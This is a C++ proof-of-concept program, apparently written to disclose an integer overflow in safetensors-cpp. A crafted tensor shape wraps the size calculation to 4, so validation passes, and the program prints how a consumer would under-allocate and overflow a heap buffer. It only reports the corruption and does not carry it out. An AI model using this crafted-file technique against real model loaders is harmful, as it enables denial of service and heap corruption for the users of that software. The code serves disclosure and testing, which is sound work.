/** * test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp * * This program loads a malicious .safetensors file where shape dimensions * are crafted to overflow uint64 multiplication in get_shape_size(). * * The file passes safetensors-cpp validation because: * shape = [4194305, 4194305, 211106198978564] * get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4) * tensor_size = 4 * sizeof(F32) = 16 bytes * data_offsets = [0, 16] -> data_size = 16 bytes * tensor_size == data_size -> VALIDATION PASSES * * But the declared shape claims ~3.7 * 10^27 elements. * * IMPACT: Any code that trusts the shape for buffer allocation or iteration * will either: * (a) Attempt a massive allocation (DoS / OOM) * (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow) * (c) Iterate over wrong number of elements, causing OOB reads * * Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc */ #include #include #include #include #include #include #include #include #include "safetensors.hh" int main(int argc, char *argv[]) { const char *filepath = "overflow_tensor.safetensors"; if (argc > 1) { filepath = argv[1]; } printf("=== safetensors-cpp Integer Overflow PoC ===\n\n"); // Read file into memory std::ifstream ifs(filepath, std::ios::binary | std::ios::ate); if (!ifs.is_open()) { fprintf(stderr, "Failed to open %s\n", filepath); return 1; } size_t filesize = ifs.tellg(); ifs.seekg(0); std::vector data(filesize); ifs.read(reinterpret_cast(data.data()), filesize); ifs.close(); printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize); // Parse with safetensors-cpp safetensors::safetensors_t st; std::string warn, err; bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err); if (!ok) { printf("[!] load_from_memory FAILED: %s\n", err.c_str()); return 1; } if (!warn.empty()) { printf("[!] Warnings: %s\n", warn.c_str()); } printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n"); // Validate data offsets (this is the check that should catch overflow) std::string val_err; bool valid = safetensors::validate_data_offsets(st, val_err); printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED"); if (!valid) { printf(" Error: %s\n", val_err.c_str()); } // Examine the tensor for (size_t i = 0; i < st.tensors.size(); i++) { std::string key = st.tensors.keys()[i]; safetensors::tensor_t tensor; st.tensors.at(i, &tensor); printf("\n[*] Tensor: '%s'\n", key.c_str()); printf(" dtype: F32\n"); printf(" shape: ["); for (size_t j = 0; j < tensor.shape.size(); j++) { if (j > 0) printf(", "); printf("%zu", tensor.shape[j]); } printf("]\n"); printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]); // Show the overflow size_t shape_size = safetensors::get_shape_size(tensor); size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype); size_t tensor_size = dtype_bytes * shape_size; printf("\n [OVERFLOW ANALYSIS]\n"); printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~3.7e27)\n", shape_size); printf(" get_dtype_bytes() = %zu\n", dtype_bytes); printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size); printf(" data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]); printf(" tensor_size == data_size? %s\n", tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO"); // Demonstrate the danger: a naive consumer trusting shape printf("\n [IMPACT DEMONSTRATION]\n"); printf(" A consumer that trusts shape dimensions would compute:\n"); printf(" shape[0] * shape[1] * shape[2] = "); // Use __int128 or manual check to show the true product __uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2]; printf("OVERFLOW (too large for uint64)\n"); printf(" True product > UINT64_MAX: %s\n", true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO"); // Simulate what a consumer would do printf("\n [SIMULATED CONSUMER BEHAVIOR]\n"); // Scenario 1: Consumer uses shape for allocation (overflows to small buffer) size_t alloc_size = 1; for (size_t j = 0; j < tensor.shape.size(); j++) { alloc_size *= tensor.shape[j]; // Same overflow! } alloc_size *= dtype_bytes; printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size); printf(" Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n", tensor.shape[0], tensor.shape[1], tensor.shape[2]); // Show it: allocate the overflowed-size buffer, then show what happens // when iterating over shape dimensions printf("\n If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size); printf(" -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size); printf(" This is a critical memory safety vulnerability.\n"); } printf("\n=== DIFFERENTIAL RESULT ===\n"); printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n"); printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n"); printf(" Impact: A model file that Rust deems invalid is accepted by C++\n"); printf(" The shape values cause integer overflow, enabling heap corruption\n"); return 0; }